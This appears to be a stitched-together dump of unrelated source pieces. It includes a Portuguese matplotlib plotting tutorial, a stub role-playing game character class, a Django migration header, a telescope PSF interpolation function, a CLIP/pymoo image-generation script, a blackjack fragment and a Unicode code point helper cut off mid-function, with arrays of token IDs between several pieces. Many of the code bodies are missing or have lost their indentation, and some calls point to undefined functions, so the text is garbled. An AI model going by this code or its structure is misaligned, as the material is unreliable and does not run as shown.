Em seu livro _The Visual Display of Quantitative Information_, [[Edward Tufte]](https://www.edwardtufte.com/tufte/), conhecido como o guru do _design_ aplicado à visualização de dados, afirma que, a cada ano, o mundo produz algo entre 900 bilhões e 2 trilhões de imagens impressas de gráficos. Ele destaca que o _design_ de um gráfico estatístico, por exemplo, é uma matéria universal similar à Matemática e não está atrelado a características únicas de uma linguagem particular. Portanto, aprender visualização de dados para comunicar dados com eficiência é tão importante quanto aprender a Língua Portuguesa para escrever melhor.
Você pode ver uma lista sugestiva de bons blogues e livros sobre visualização de dados nas páginas de aprendizagem do software Tableau [[TabelauBlogs]](https://www.tableau.com/learn/articles/best-data-visualization-blogs), [[TabelauBooks]](https://www.tableau.com/learn/articles/books-about-data-visualization).
## _Data storytelling_
_Data Storytelling_ é o processo de "contar histórias através dos dados". [[Cole Knaflic]](http://www.storytellingwithdata.com), uma engenheira de dados do Google, ao perceber como a quantidade de informação produzida no mundo às vezes é muito mal lida e comunicada, escreveu dois *best-sellers* sobre este tema a fim de ajudar pessoas a comunicarem melhor seus dados e produtos quantitativos. Ela argumenta em seu livro *Storytelling with Data: A Data Visualization Guide for Business Professionals* (*Storytelling com Dados: um Guia Sobre Visualização de Dados Para Profissionais de Negócios*, na versão em português) que não somos inerentemente bons para "contar uma história" através dos dados. Cole mostra com poucas lições o que devemos aprender para atingir uma comunicação eficiente por meio da visualização de dados.
## Plotagem matemática
_Plotagem_ é o termo comumente empregado para o esboço de gráficos de funções matemáticas via computador. Plotar gráficos é uma das tarefas que você mais realizará como futuro(a) cientista ou analista de dados. Nesta aula, nós introduziremos você ao universo da plotagem de gráficos em duas dimensões e ensinar como você pode visualizar dados facilmente com a biblioteca *matplotlib*. Daremos uma visão geral principalmente sobre a plotagem de funções matemáticas utilizando *arrays* e recursos de computação vetorizada com *numpy* já aprendidos. Ao longo do curso, você aprenderá a fazer plotagens mais interessantes de cunho estatístico.
## A biblioteca *matplotlib*
*Matplotlib* é a biblioteca Python mais conhecida para plotagem 2D (bidimensional) de *arrays*. Sua filosofia é simples: criar plotagens simples com apenas alguns comandos, ou apenas um. John Hunter [[History]](https://matplotlib.org/users/history.html), falecido em 2012, foi o autor desta biblioteca. Em 2008, ele escreveu que, enquanto buscava uma solução em Python para plotagem 2D, ele gostaria de ter, entre outras coisas:
- gráficos bonitos com pronta qualidade para publicação;
- capacidade de incorporação em interfaces gráficas para desenvolvimento de aplicações;
- um código fácil de entender e de manusear.
O *matplotlib* é um código dividido em três partes:
1. A interface *pylab*: um conjunto de funções predefinidas no submódulo `matplotlib.pyplot`.
2. O *frontend*: um conjunto de classes responsáveis pela criação de figuras, textos, linhas, gráficos etc. No *frontend*, todos os elementos gráficos são objetos ainda abstratos.
3. O *backend*: um conjunto de renderizadores responsáveis por converter os gráficos para dispositivos onde eles podem ser, de fato, visualizados. A [[renderização]](https://pt.wikipedia.org/wiki/Renderização) é o produto final do processamento digital. Por exemplo, o *backend* PS é responsável pela renderização de [[PostScript]](https://www.adobe.com/br/products/postscript.html). Já o *backend* SVG constroi gráficos vetoriais escaláveis ([[Scalable Vector Graphics]](https://www.w3.org/Graphics/SVG/).
Veja o conceito de [[Canvas]](https://en.wikipedia.org/wiki/Canvas_(GUI)).
### Sessões interativas do *matplotlib*
Sessões interativas do *matplotlib* são habilitadas através de um [[comando mágico]](https://ipython.readthedocs.io/en/stable/interactive/magics.html):
- Em consoles, use `%matplotlib`;
- No Jupyter notebook, use `%matplotlib inline`.
Lembre que na aula anterior usamos o comando mágico `%timeit` para temporizar operações.
Para usar plenamente o matplotlib nesta aula, vamos usar:
```python
%matplotlib inline
from matplotlib import pyplot as plt
```
A segunda instrução também pode ser feita como
```python
import matplotlib.pyplot as plt
```
em que `plt` é um *alias* já padronizado.
# chamada padrão
%matplotlib inline
import matplotlib.pyplot as plt
## Criação de plots simples
Vamos importar o *numpy* para usarmos os benefícios da computação vetorizada e plotar nossos primeiros exemplos.
import numpy as np
x = np.linspace(-10,10,50)
y = x
plt.plot(x,y); # reta y = x
**Exemplo:** plote o gráfico da parábola $f(x) = ax^2 + bx + c$ para valores quaisquer de $a,b,c$ no intervalo $-20 \leq x \leq 20$.
x = np.linspace(-20,20,50)
a,b,c = 2,3,4
y = a*x**2 + b*x + c # f(x)
plt.plot(x,y);
Podemos definir uma função para plotar a parábola:
def plota_parabola(a,b,c):
x = np.linspace(-20,21,50)
y = a*x**2 + b*x + c
plt.plot(x,y)
Agora podemos estudar o que cada coeficiente faz:
# mude o valor de a e considere b = 2, c = 1
for a in np.linspace(-2,3,10):
plota_parabola(a,2,1)
# mude o valor de b e considere a = 2, c = 1
for b in np.linspace(-2,3,20):
plota_parabola(2,b,1)
# mude o valor de c e considere a = 2, b = 1
for c in np.linspace(-2,3,10):
plota_parabola(2,1,c) # por que você não vê muitas mudanças?
# mude o valor de a, b e c
valores = np.linspace(-2,3,5)
for a in valores:
for b in valores:
for c in valores:
plota_parabola(a,b,c)
**Exemplo:** plote o gráfico da função $g(t) = a\cos(bt + \pi)$ para valores quaisquer de $a$ e $b$ no intervalo $0 \leq t \leq 2\pi$.
t = np.linspace(0,2*np.pi,50,endpoint=True) # t: ângulo
a, b = 1, 1
plt.plot(t,a*np.cos(b*t + np.pi));
b = 2
plt.plot(t,a*np.cos(b*t + np.pi));
b = 3
plt.plot(t,a*np.cos(b*t + np.pi));
As cores e marcações no gráfico são todas padronizadas. Vejamos como alterar tudo isto.
## Alteração de propriedades e estilos de linhas
Altere:
- cores com `color` ou `c`,
- espessura de linha com `linewidth` ou `lw`
- estilo de linha com `linestyle` ou `ls`
- tipo de símbolo marcador com `marker`
- largura de borda do símbolo marcardor com `markeredgewidth` ou `mew`
- cor de borda do símbolo marcardor com `markeredgecolor` ou `mec`
- cor de face do símbolo marcardor com `markerfacecolor` ou `mfc`
- transparência com `alpha` no intervalo [0,1]
g = lambda a,b: a*np.cos(b*t + np.pi) # assume t anterior
# estude cada exemplo
# a ordem do 3o. argumento em diante pode mudar
plt.plot(t,g(1,1),color='c',linewidth=5,linestyle='-.',alpha=.3)
plt.plot(t,g(1,2),c='g',ls='-',lw='.7',marker='s',mfc='y',ms=8)
plt.plot(t,g(1,3),c='#e26d5a',ls=':', marker='d',mec='k',mew=2.0);
Cores e estilo de linha podem ser especificados de modo reduzido e em ordens distintas usando um especificador de formato.
plt.plot(t,g(1,1),'yv') # amarelo; triângulo para baixo;
plt.plot(t,g(1,2),':c+') # pontilhado; ciano; cruz;
plt.plot(t,-g(2,2),'>-.r'); # triangulo direita; traço-ponto; vermelho;
### Plotagem múltipla
O exemplo acima poderia ser feito como plotagem múltipla em 3 blocos do tipo (`x,y,'fmt')`, onde `x` e `y` são as informações dos eixos coordenados e `fmt` é uma string de formatação.
plt.plot(t,g(1,1),'yv', t,g(1,2),':c+', t,-g(2,2),'>-.r'); # 3 blocos sequenciados
Para verificar todas as opções de propriedades e estilos de linhas, veja `plt.plot?`.
### Especificação de figuras
Use `plt.figure` para criar um ambiente de figura e altere:
- a largura e altura (em polegadas) com `figsize = (largura,altura)`. O padrão é (6.4,4.8).
- a resolução (em pontos por polegadas) com `dpi`. O padrão é 100.
- a cor de fundo (*background*) com `facecolor`. O padrão é `w` (branco).
**Exemplo:** Plote os gráficos de $h_1(x) = a\sqrt{x}$ e $h_2(x) = be^{\frac{x}{c}}$ para valores de a,b,c e propriedades acima livres.
x = np.linspace(0,10,50,endpoint=True)
h1, h2 = lambda a: a*np.sqrt(x), lambda b,c: b*np.exp(x/c)
plt.figure(figsize=(8,6), dpi=200, facecolor='#e0eeee')
plt.plot(x,h1(.9),x,h2(1,9));
### Alterando limites e marcações de eixos
Altere:
- o intervalo do eixo `x` com `xlim`
- o intervalo do eixo `y` com `ylim`
- as marcações do eixo `x` com `xticks`
- as marcações do eixo `y` com `yticks`
plt.plot(x,h1(.9),x,h2(1,9)); plt.xlim(1.6,9.2); plt.ylim(1.0,2.8);
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi]); # lista de múltiplos de pi
plt.yticks([-1, 0, 1]); # 3 valores em y
### Especificando texto de marcações em eixos
Podemos alterar as marcações das `ticks` passando um texto indicativo. No caso anterior, seria melhor algo como:
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
# o par de $...$ formata os números na linguagem TeX
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi], ['$0$','$\pi/2$','$\pi$','$3/2\pi$','$2\pi$']);
plt.yticks([-1, 0, 1], ['$y = -1$', '$y = 0$', '$y = +1$']);
### Deslocamento de eixos principais
Os eixos principais podem ser movidos para outras posições arbitrárias e as bordas da área de plotagem desligadas usando `spine`.
# plotagem da função
x = np.linspace(-3,3)
plt.plot(x,x**1/2*np.sin(x)-0.5); # f(x) = √x*sen(x) - 1/2
ax = plt.gca()
ax.spines['right'].set_color('none') # remove borda direita
ax.spines['top'].set_color('none') # remove borda superior
ax.spines['bottom'].set_position(('data',0)) # desloca eixo para x = 0
ax.spines['left'].set_position(('data',0)) # desloca eixo para y = 0
ax.xaxis.set_ticks_position('top') # desloca marcações para cima
ax.yaxis.set_ticks_position('right') # desloca marcações para a direita
plt.xticks([-2,0,2]) # altera ticks de x
ax.set_xticklabels(['esq.','zero','dir.']) # altera ticklabels de x
plt.yticks([-0.4,0,0.4]) # altera ticks de y
ax.set_yticklabels(['sup.','zero','inf.']); # altera ticklabels de y
### Inserção de legendas
Para criarmos:
- uma legenda para os gráficos, usamos `legend`.
- uma legenda para o eixo x, usamos `xlabel`
- uma legenda para o eixo y, usamos `ylabel`
- um título para o gráfico, usamos `title`
**Exemplo:** plote o gráfico da reta $f_1(x) = x + 1$ e da reta $f_2(x) = 1 - x$ e adicione uma legenda com cores azul e laranja.
plt.plot(x, x + 1,'-b', label = 'y = x + 1' )
plt.plot(x, 1-x, c = [1.0,0.5,0.0], label = 'y = 1 - x'); # laranja: 100% de vermelho, 50% verde
plt.legend(loc = 'best') # 'loc=best' : melhor localização da legenda
plt.xlabel('x'); plt.ylabel('y'); plt.title('Gráfico de duas retas');
#### Localização de legendas
Use `loc=valor` para especificar onde posicionar a legenda. Use `plt.legend?` para verificar as posições disponíveis para `valor`. Vide tabela de valores `Location String` e `Location Code`.
plt.plot(np.nan,np.nan,label='upper right'); # nan : not a number
plt.legend(loc=1); # usando número
plt.plot(np.nan,np.nan,label='loc=1');
plt.legend(loc='upper right'); # usando a string correspondente
### Alteração de tamanho de fonte
Para alterar o tamanho da fonte de legendas, use `fontsize`.
plt.plot(np.nan,np.nan,label='legenda');
FSx, FSy, FSleg, FStit = 10, 20, 30, 40
plt.xlabel('Eixo x',c='b', fontsize=FSx)
plt.ylabel('Eixo y',c='g', fontsize=FSy)
plt.legend(loc='center', fontsize=FSleg);
plt.title('Título', c='c', fontsize=FStit);
### Anotações simples
Podemos incluir anotações em gráficos com a função `annotate(texto,xref,yref)`
plt.plot(np.nan,np.nan);
plt.annotate('P (0.5,0.5)',(0.5,0.5));
plt.annotate('Q (0.1,0.8)',(0.1,0.8));
**Exemplo**: gere um conjunto de 10 pontos $(x,y)$ aleatórios em que $0.2 < x,y < 0.8$ e anote-os no plano.
# gera uma lista de 10 pontos satisfazendo a condição
P = []
while len(P) != 10:
xy = np.round(np.random.rand(2),1)
test = np.all( (xy > 0.2) & (xy < 0.8) )
if test:
P.append(tuple(xy))
# plota o plano
plt.figure(figsize=(8,8))
plt.xlim(0,1)
plt.ylim(0,1)
for ponto in P:
plt.plot(ponto[0],ponto[1],'o')
plt.annotate(f'({ponto[0]},{ponto[1]})',ponto,fontsize=14)
**Problema:** o código acima tem um problema. Verifique que `len(P) = 10`, mas ele não plota os 10 pontos como gostaríamos de ver. Descubra o que está acontecendo e proponha uma solução.
## Multiplotagem e eixos
No matplotlib, podemos trabalhar com a função `subplot(m,n,p)` para criar múltiplas figuras e eixos independentes como se cada figura fosse um elemento de uma grande "matriz de figuras" de `m` linhas e `n` colunas, enquanto `p` é o índice da figura (este valor será no máximo o produto `mxn`). A função funciona da seguinte forma.
- Exemplo 1: suponha que você queira criar 3 figuras e dispô-las em uma única linha. Neste caso, `m = 1`, `n = 3` e `p` variará de 1 a 3, visto que `mxn = 3`.
- Exemplo 2: suponha que você queira criar 6 figuras e dispô-las em 2 linhas e 3 colunas. Neste caso, `m = 2`, `n = 3` e `p` variará de 1 a 6, visto que `mxn = 6`.
- Exemplo 3: suponha que você queira criar 12 figuras e dispô-las em 4 linhas e 3 colunas. Neste caso, `m = 4`, `n = 3` e `p` variará de 1 a 12, visto que `mxn = 12`.
Cada plotagem possui seu eixo independentemente da outra.
**Exemplo 1:** gráfico de 1 reta, 1 parábola e 1 polinômio cúbico lado a lado.
x = np.linspace(-5,5,20)
plt.figure(figsize=(15,4))
# aqui p = 1
plt.subplot(1,3,1) # plt.subplot(131) também é válida
plt.plot(x,2*x-1,c='r',marker='^')
plt.title('$y=2x-1$')
# aqui p = 2
plt.subplot(1,3,2) # plt.subplot(132) também é válida
plt.plot(x,3*x**2 - 2*x - 1,c='g',marker='o')
plt.title('$y=3x^2 - 2x - 1$')
# aqui p = 3
plt.subplot(1,3,3) # plt.subplot(133) também é válida
plt.plot(x,1/2*x**3 + 3*x**2 - 2*x - 1,c='b',marker='*')
plt.title('$y=1/2x^3 + 3x^2 - 2x - 1$');
**Exemplo 2:** gráficos de {$sen(x)$, $sen(2x)$, $sen(3x)$} e {$cos(x)$, $cos(2x)$, $cos(3x)$} dispostos em matriz 2x3.
plt.figure(figsize=(15,4))
plt.subplots_adjust(top=2.5,right=1.2) # ajusta a separação dos plots individuais
def sencosx(p):
x = np.linspace(0,2*np.pi,50)
plt.subplot(2,3,p)
if p <= 3:
plt.plot(x,np.sin(p*x),c=[p/4,p/5,p/6],label=f'$sen({p}x)$')
plt.title(f'subplot(2,3,{p})');
else:
plt.title(f'subplot(2,3,{p})');
p-=3 #
plt.plot(x,np.cos(p*x),c=[p/9,p/7,p/8],label=f'$cos({p}x)$')
plt.legend(loc=0,fontsize=8)
plt.xlabel('x'); plt.ylabel('y');
# plotagem
for p in range(1,7):
sencosx(p)
**Exemplo 3:** gráficos de um ponto isolado em matriz 4 x 3.
plt.figure(figsize=(15,4))
m,n = 4,3
for p in range(1,m*n+1):
star(p);
## Plots com gradeado
Podemos habilitar o gradeado usando `grid(b,which,axis)`.
Para especificar o gradeado:
- em ambos os eixos, use `b='True'` ou `b='False'`.
- maior, menor ou ambos, use `which='major'`, `which='minor'` ou `which='both'`.
- nos eixos x, y ou ambos, use `axis='x'`, `axis='y'` ou `axis='both'`.
x = np.linspace(-10,10)
plt.plot(x,x)
plt.grid(True)
plt.plot(x,x)
plt.grid(True,which='major',axis='x')
plt.plot(x,x)
plt.grid(True,which='major',axis='y')
**Exemplo:** plotagem de gradeado.
Neste exemplo, um eixo abstrato é adicionado sobre a figura (criada diretamente) origem no ponto (0.025,0.025), largura 0.95 e altura 0.95.
ax = plt.axes([0.025, 0.025, 0.95, 0.95])
ax.set_xlim(0,4)
ax.set_ylim(0,3)
# MultipleLocator estabelece pontos de referência para divisão da grade
ax.xaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em X
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.2)) # divisor maior em X
ax.yaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em Y
ax.yaxis.set_minor_locator(plt.MultipleLocator(0.1)) # divisor maior em Y
# propriedades das linhas
ax.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='x', linewidth=0.5, linestyle=':', color='b')
ax.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='y', linewidth=0.5, linestyle=':', color='g')
# para remover as ticks, adicione comentários
#ax.set_xticklabels([])
#ax.set_yticklabels([]);
plt.plot(x,x,'k')
plt.plot(x,-x+4,'k')
## Plots com preenchimento
Podemos usar `fill_between` para criar preenchimentos de área em gráficos.
x = np.linspace(-np.pi, np.pi, 60)
y = np.sin(2*x)*np.cos(x/2)
plt.fill_between(x,y,alpha=0.5);
x = np.linspace(-np.pi, np.pi, 60)
f1 = np.sin(2*x)
f2 = 0.5*np.sin(2*x)
plt.plot(x,f1,c='r');
plt.plot(x,f2,c='k');
plt.fill_between(x,f1,f2,color='g',alpha=0.2); | [
2,
28114,
363,
368,
275,
40138,
3970,
401,
4808,
6759,
29487,
8019,
62,
198,
198,
2235,
15612,
23638,
16175,
28749,
390,
9955,
418,
220,
198,
198,
32,
5874,
23638,
16175,
28749,
390,
9955,
418,
38251,
23781,
1413,
78,
466,
369,
258,
6... | 2.202508 | 8,133 |
from pprint import pprint as pp
from character_tracker.basic_moves import basic_moves
from character_tracker.roller import Roller
from character_tracker.utils import get_int_input, get_str_input
class Character(object):
"""A Monster of the Week game character.
"""
@property
@charm.setter
@property
@cool.setter
@property
@tough.setter
@property
@weird.setter
@property
@sharp.setter
if __name__ == "__main__":
pass
| [
6738,
279,
4798,
1330,
279,
4798,
355,
9788,
198,
6738,
2095,
62,
2213,
10735,
13,
35487,
62,
76,
5241,
1330,
4096,
62,
76,
5241,
198,
6738,
2095,
62,
2213,
10735,
13,
10646,
1330,
24945,
198,
6738,
2095,
62,
2213,
10735,
13,
26791,
... | 2.76 | 175 |
# Generated by Django 2.2.5 on 2019-10-04 18:34
from django.db import migrations
| [
2,
2980,
515,
416,
37770,
362,
13,
17,
13,
20,
319,
13130,
12,
940,
12,
3023,
1248,
25,
2682,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
628
] | 2.766667 | 30 |
import numpy as np
def provide_PSF_2D(x=None,y=None,PSF_version=None):
""" Provides 2D PSF at any position in the detector plane
This a version which takes a finite nubmer of pregenerated PSF and \
creates the interpolated version at required position
(Future: version which takes interpolated values for Zernike \
coefficients and generates image on the fly?)
To be used with the focused data taken on July 25 and 26
(e.g., 21400 for HgAr, 21604 for Ne, 21808 for Kr)
Example usage: ``provide_PSF_2D(10,2010)'' 10 is x-coordinate,
and 2010 is y-coordinate
@param[in] x x-coordinate
@param[in] y y-coordinate
@param[in] PSF_version version of the PSF input files
@returns numpy array, 100x100, oversampled 5 times,
corresponding to 20x20 physical pixels
(300x300 microns)
"""
# on tiger the directory contaning array of PSFs is at:
DATA_DIRECTORY='/tigress/ncaplar/PIPE2D-450/'
if PSF_version is None:
PSF_version='Sep12_v1'
positions_of_simulation=np.load(DATA_DIRECTORY+\
'positions_of_simulation_00_from_'+PSF_version+'.npy')
array_of_simulation=np.load(DATA_DIRECTORY+\
'array_of_simulation_00_from_'+PSF_version+'.npy')
# x and y position with simulated PSFs
x_positions_of_simulation=positions_of_simulation[:,1]
y_positions_of_simulation=positions_of_simulation[:,2]
# This is a simple code that finds the closest avaliable PSFs, given the x and y position
# This will have to be improved in order when we get to work with the full populated dectector plane
# how far in x-dimension are you willing to search for suitable simulated PSFs
x_search_distance=20
# positions of all simulated PSFs in that range
positions_of_simulation_in_acceptable_x_range=\
positions_of_simulation[(x_positions_of_simulation<(x+x_search_distance))\
&(x_positions_of_simulation>(x-x_search_distance))]
# if there are no simulated PSF avaliable in the specified x-range we are not able to provide the solution
if len(positions_of_simulation_in_acceptable_x_range)<2:
print('No simulated PSFs are avaliable in this x-area of the detector,')
print('probably because this fiber has not been illuminated;')
print('returning the closest avaliable PSFs, BUT that is probably not what you want')
distances=np.sqrt(((x-x_positions_of_simulation)**2+\
(y-y_positions_of_simulation)**2).astype(float))
index_of_closest_distance=np.where(distances[distances==\
np.min(distances)])[0][0]
return array_of_simulation[index_of_closest_distance]
# y-distance from the requested positions for all of the suitable simulated PSFs
distances_of_y_requested_position_from_avaliable=\
y-positions_of_simulation_in_acceptable_x_range[:,2]
# out of the suitable PSFs which 2 are the closest
index_of_1st_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[0])[0][0]
index_of_2nd_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[1])[0][0]
# where are these 2 closest PSF in the initial table
index_of_1st_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_1st_closest_simulated_psf]))[0][0]
index_of_2nd_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_2nd_closest_simulated_psf]))[0][0]
# extract the 2 simulated PSFs
first_array_simulation=\
array_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation]
second_array_simulation=\
array_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation]
# distance of each PSF from the proposed position
y1_distance=\
y-positions_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation][2]
y2_distance=\
y-positions_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation][2]
# if you requested psf at the exact position of existing PSF use that one
if y1_distance==0:
return first_array_simulation
else:
# create the predicted PSF as a linear interpolation of these two PSFs
predicted_psf=(second_array_simulation-first_array_simulation*(y2_distance/y1_distance))/(1-y2_distance/y1_distance)
return predicted_psf
| [
198,
11748,
299,
32152,
355,
45941,
198,
198,
4299,
2148,
62,
3705,
37,
62,
17,
35,
7,
87,
28,
14202,
11,
88,
28,
14202,
11,
3705,
37,
62,
9641,
28,
14202,
2599,
198,
220,
220,
220,
37227,
47081,
362,
35,
6599,
37,
379,
597,
229... | 2.309231 | 2,199 |
import sys
for i in sys.stdin:
ab = i.split()
n = int(ab[0])
h = int(ab[1])
v = int(ab[2])
print(max(h, n - h) * max(v, n - v) * 4)
| [
11748,
25064,
198,
198,
1640,
1312,
287,
25064,
13,
19282,
259,
25,
198,
220,
220,
220,
450,
796,
1312,
13,
35312,
3419,
198,
220,
220,
220,
299,
796,
493,
7,
397,
58,
15,
12962,
198,
220,
220,
220,
289,
796,
493,
7,
397,
58,
16... | 1.823529 | 85 |
import torch
import numpy as np
import pickle
import os
from PIL import Image
from pathlib import Path
from tqdm import tqdm
import dnnlib, legacy
import clip
import torch.nn.functional as F
import torchvision.transforms as T
import scipy
import warnings
import torchvision.models
from pymoo.core.problem import Problem
from pymoo.algorithms.moo.nsga2 import NSGA2
from pymoo.factory import get_sampling, get_crossover, get_mutation , get_selection
from pymoo.factory import get_decomposition
from pymoo.util.termination.default import MultiObjectiveDefaultTermination
from pymoo.optimize import minimize
from pymoo.util.display import Display
import time
import sys
import argparse
import shutil
from pymoo.visualization.scatter import Scatter
from numpy.linalg import norm
import matplotlib.pyplot as plt
import json
from qqdm import qqdm, format_str
from attn_loss import attention_lib,losses
import re
# ignore errors
warnings.filterwarnings('ignore')
# gen_model is used to get proper clip model for image genetate
gen_model_name = 'ViT-B/16'
# dis_model is used to grading an image and an text simularity
dis_model_name = 'ViT-L/14@336px'
# for verbose to display processing step
# timing
# generating image
# loading pre-training model
# generating (tensor)image using text feature and noise
# transform tensor into image
# scoring with text and image labels
# pick image with highest score
# generate image score using [text,image,labels]
# get socre from noise
# generate image using noise
# for tournament selection
if __name__ == '__main__':
# parser for convenient using
parser = argparse.ArgumentParser()
# whether to run get fesiable solution or not
parser.add_argument('-r', '--run', action='store_true',default = False)
# setting text
parser.add_argument('-t', '--text',type = str,default = 'a dog lying on an orange couch in the living room.')
# setting image generation (for normal generating)
parser.add_argument('-n', '--num',type = int,default = 10)
# pick #image
parser.add_argument('-p', '--pick',type = int,default = 1)
# get fesiable solution setting
parser.add_argument('-s', '--set',type = str,default = '1 1 1')
# draw plot
parser.add_argument('-d', '--draw',action='store_true',default = False)
# save memory
parser.add_argument('-m', '--save_mem',action='store_true',default = False)
args = parser.parse_args()
# split setting sentence
set_list = args.set
set_list = set_list.split()
pop = int(set_list[0])
ofs = int(set_list[1])
gen = int(set_list[2])
t = Timer()
txt = args.text
if not os.path.exists('image_result/{}'.format(txt)):
os.mkdir('image_result/{}'.format(txt))
path = 'image_result/{}/noise.txt'.format(txt)
f = open(path, 'w')
print('generate text = {}'.format(txt))
# run get fesiable solution
if args.run==True :
print('find fes : pop = {} , ofs = {} , gen = {}'.format(pop,ofs,gen))
res = get_fes(txt = txt,pop = pop, ofs = ofs,gen = gen)
# np.set_printoptions(threshold=sys.maxsize)
# print(res.X,file = f)
# draw pareto front
if args.draw == True:
ploter(res.F)
# generating image from res.X (nds)
# gen_from_noises(txt = txt,noises = res.X)
# Multi-Criteria Decision Making
best_res_id = mcdm(res)
gen_from_noises(txt = txt,noises = np.array([res.X[best_res_id]]),name = 'best_pick')
# store memory
if args.save_mem == True:
make_memory(txt = txt,noise = res.X[best_res_id])
# gen_from_noises(txt = txt,noises = np.array([noise_memory(txt = txt,pop = 1,pick = True)]),name = '123')
else :
print('generate {} images'.format(args.num))
gen_scored(txt = txt,image_n = args.num)
t.print_time()
f.close() | [
11748,
28034,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2298,
293,
198,
11748,
28686,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
11748,
288,
20471,
8... | 2.622163 | 1,498 |
# ABC145c
if __name__ == '__main__':
main()
| [
2,
9738,
18781,
66,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.125 | 24 |
#'random' library import
import random
#rank list & suit dictionary
cardranks = ["Clubs", "Diamonds", "Hearts", "Spades"]
cardsuits = {"Ace":11, "One":1, "Two":2, "Three":3, "Four":4, "Five":5, "Six":6, "Seven":7, "Eight":8, "Nine":9, "Ten":10, "Jack":10, "Queen":10, "King":10}
#player class w/ public attributes
#deck class generates every possible card within the deck, appending each possiblity to a list
#dealing method assigns a random card at the beginning to each player
#card class
#return string representation, nice way of doing this.
#Input verification and looping to ensure correct input
#lol
#player name input request
player1 = Player(input("Player 1, enter your name. : "))
player2 = Player(input("Player 2, enter your name. : "))
#deck object is formed
deck = Deck()
print(f"I will now deal your initial cards, {player1.name} and {player2.name}.\n")
#first 2 random cards are generated for both players
deck.deal(player1)
deck.deal(player2)
print(f"Good luck, players.\n")
while True:
turn(player1)
turn(player2)
#!!!!!!!!!Adjust the code so that player has a hand object instead of player having a list for cards.!!!!!!!!!
#Settings n getters
| [
2,
6,
25120,
6,
5888,
1330,
198,
11748,
4738,
198,
2,
43027,
1351,
1222,
6050,
22155,
198,
9517,
81,
2283,
796,
14631,
2601,
23161,
1600,
366,
47710,
82,
1600,
366,
1544,
5889,
1600,
366,
4561,
2367,
8973,
198,
27761,
15379,
796,
1977... | 3.076726 | 391 |
#
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module defines Unicode code points helper functions.
"""
from sys import maxunicode
from typing import Iterable, Iterator, Optional, Set, Tuple, Union
CHARACTER_CLASS_ESCAPED: Set[int] = {ord(c) for c in r'-|.^?*+{}()[]\\'}
"""Code Points of escaped chars in a character class."""
CodePoint = Union[int, Tuple[int, int]]
def code_point_order(cp: CodePoint) -> int:
"""Ordering function for code points."""
return cp if isinstance(cp, int) else cp[0]
def code_point_reverse_order(cp: CodePoint) -> int:
"""Reverse ordering function for code points."""
return cp if isinstance(cp, int) else cp[1] - 1
def iter_code_points(code_points: Iterable[CodePoint], reverse=False) -> Iterator[CodePoint]:
"""
Iterates a code points sequence. Three ore more consecutive
code points are merged in a range.
:param code_points: an iterable with code points and code point ranges.
:param reverse: if `True` reverses the order of the sequence.
:return: yields code points or code point ranges.
"""
start_cp = end_cp = 0
if reverse:
code_points = sorted(code_points, key=code_point_reverse_order, reverse=True)
else:
code_points = sorted(code_points, key=code_point_order)
for cp in code_points:
if isinstance(cp, int):
cp = cp, cp + 1
if not end_cp:
start_cp, end_cp = cp
continue
elif reverse:
if start_cp <= cp[1]:
start_cp = min(start_cp, cp[0])
continue
elif end_cp >= cp[0]:
end_cp = max(end_cp, cp[1])
continue
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
start_cp, end_cp = cp
else:
if end_cp:
if end_cp > start_cp + 1:
yield start_cp, end_cp
else:
yield start_cp
def get_code_point_range(cp: CodePoint) -> Optional[CodePoint]:
"""
Returns a code point range.
:param cp: a single code point or a code point range.
:return: a code point range or `None` if the argument is not a \
code point or a code point range.
"""
if isinstance(cp, int):
if 0 <= cp <= maxunicode:
return cp, cp + 1
else:
try:
if isinstance(cp[0], int) and isinstance(cp[1], int):
if 0 <= cp[0] < cp[1] <= maxunicode + 1:
return cp
except (IndexError, TypeError):
pass
return None
def code_point_repr(cp: CodePoint) -> str:
"""
Returns the string representation of a code point.
:param cp: an integer or a tuple with at least two integers. \
Values must be in interval [0, sys.maxunicode].
"""
if isinstance(cp, int):
if cp in CHARACTER_CLASS_ESCAPED:
return r'\%s' % chr(cp)
return chr(cp)
if cp[0] in CHARACTER_CLASS_ESCAPED:
